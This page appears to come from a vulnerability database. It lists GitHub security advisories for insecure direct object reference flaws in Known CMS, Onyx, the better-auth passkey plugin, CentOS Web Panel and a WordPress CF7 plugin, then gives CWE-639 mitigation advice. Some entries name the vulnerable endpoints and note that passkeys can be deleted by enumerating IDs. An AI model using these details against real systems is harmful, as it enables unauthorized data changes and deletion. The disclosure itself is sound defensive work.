Known v1.3.1 was discovered to contain an Insecure Direct Object Reference (IDOR).

The researcher report indicates that versions 1.3.1 and prior are vulnerable. Version 1.2.2 is the last version tagged on GitHub and in Packagist, and development related to the 1.3.x branch is currently on the dev branch of the idno/known repository.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "idno/known"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-30852"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-07-20T01:32:06Z",
    "nvd_published_at": "2022-07-08T12:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Known v1.3.1 was discovered to contain an Insecure Direct Object Reference (IDOR).\n\nThe researcher report indicates that versions 1.3.1 and prior are vulnerable. Version 1.2.2 is the last version tagged on GitHub and in Packagist, and development related to the 1.3.x branch is currently on the `dev` branch of the idno/known repository.",
  "id": "GHSA-4v4p-87m3-5423",
  "modified": "2022-07-20T01:32:06Z",
  "published": "2022-07-09T00:00:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30852"
    },
    {
      "type": "WEB",
      "url": "https://blog.jitendrapatro.me/multiple-vulnerabilities-in-idno-known-php-cms-software"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/idno/known"
    },
    {
      "type": "WEB",
      "url": "https://withknown.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Known v1.3.1 contains Insecure Direct Object Reference"
}

GHSA-4V78-J8G9-RPV2

Vulnerability from github – Published: 2025-07-22 21:31 – Updated: 2025-07-22 21:31
VLAI
Details

Authorization bypass in update_user_group in onyx-dot-app Onyx Enterprise Edition 0.27.0 allows remote authenticated attackers to modify arbitrary user groups via crafted PATCH requests to the /api/manage/admin/user-group/id endpoint, bypassing intended curator-group assignment checks.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-51479"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-22T19:15:25Z",
    "severity": "MODERATE"
  },
  "details": "Authorization bypass in update_user_group in onyx-dot-app Onyx Enterprise Edition 0.27.0 allows remote authenticated attackers to modify arbitrary user groups via crafted PATCH requests to the /api/manage/admin/user-group/id endpoint, bypassing intended curator-group assignment checks.",
  "id": "GHSA-4v78-j8g9-rpv2",
  "modified": "2025-07-22T21:31:15Z",
  "published": "2025-07-22T21:31:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51479"
    },
    {
      "type": "WEB",
      "url": "https://github.com/onyx-dot-app/onyx/pull/4714"
    },
    {
      "type": "WEB",
      "url": "https://github.com/onyx-dot-app/onyx"
    },
    {
      "type": "WEB",
      "url": "https://www.gecko.security/blog/cve-2025-51479"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4VCF-Q4XF-F48M

Vulnerability from github – Published: 2025-11-25 21:42 – Updated: 2025-11-25 21:42
VLAI
Summary
Better Auth Passkey Plugin allows passkey deletion through IDOR
Details

Summary

Affected versions of the better-auth passkey plugin allow users with any valid session to delete arbitrary passkeys via their ID using POST /passkey/delete-passkey.

Details

ctx.body.id is implicitly trusted and used in passkey deletion queries.

better-auth applications configured with useNumberId may use auto incrementing IDs which makes it trivial to delete all passkeys via enumeration.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@better-auth/passkey"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-25T21:42:53Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "# Summary\n\nAffected versions of the better-auth passkey plugin allow users with any valid session to delete arbitrary passkeys via their ID using `POST /passkey/delete-passkey`.\n\n# Details\n\n`ctx.body.id` is implicitly trusted and used in passkey deletion queries.\n\nbetter-auth applications configured with `useNumberId` may use auto incrementing IDs which makes it trivial to delete all passkeys via enumeration.",
  "id": "GHSA-4vcf-q4xf-f48m",
  "modified": "2025-11-25T21:42:53Z",
  "published": "2025-11-25T21:42:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/better-auth/better-auth/security/advisories/GHSA-4vcf-q4xf-f48m"
    },
    {
      "type": "WEB",
      "url": "https://github.com/better-auth/better-auth/commit/06d68239e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/better-auth/better-auth"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Better Auth Passkey Plugin allows passkey deletion through IDOR"
}

GHSA-4VP3-JQP3-FQXC

Vulnerability from github – Published: 2022-05-24 16:54 – Updated: 2023-03-03 15:30
VLAI
Details

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to delete databases (such as oauthv2) from the server via an attacker account.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-14245"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-08-21T19:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to delete databases (such as oauthv2) from the server via an attacker account.",
  "id": "GHSA-4vp3-jqp3-fqxc",
  "modified": "2023-03-03T15:30:24Z",
  "published": "2022-05-24T16:54:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14245"
    },
    {
      "type": "WEB",
      "url": "https://centos-webpanel.com/changelog-cwp7"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/154155/CentOS-Control-Web-Panel-CWP-0.9.8.851-Arbitrary-Database-Drop.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/154155/CentOS-WebPanel.com-CentOS-Control-Web-Panel-CWP-0.9.8.851-Arbitrary-Database-Drop.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/154155/CentOS-WebPanel.com-Control-Web-Panel-CWP-0.9.8.851-Arbitrary-Database-Drop.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4VQ2-QQ4M-VP5X

Vulnerability from github – Published: 2026-02-03 15:30 – Updated: 2026-02-03 18:30
VLAI
Details

Authorization Bypass Through User-Controlled Key vulnerability in HT Plugins Extensions For CF7 extensions-for-cf7 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Extensions For CF7: from n/a through <= 3.4.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-24991"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-03T15:16:18Z",
    "severity": "MODERATE"
  },
  "details": "Authorization Bypass Through User-Controlled Key vulnerability in HT Plugins Extensions For CF7 extensions-for-cf7 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Extensions For CF7: from n/a through \u003c= 3.4.0.",
  "id": "GHSA-4vq2-qq4m-vp5x",
  "modified": "2026-02-03T18:30:43Z",
  "published": "2026-02-03T15:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24991"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/extensions-for-cf7/vulnerability/wordpress-extensions-for-cf7-plugin-3-4-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested.

Mitigation
Architecture and Design Implementation

Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected.

Mitigation
Architecture and Design

Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering.

No CAPEC attack patterns related to this CWE.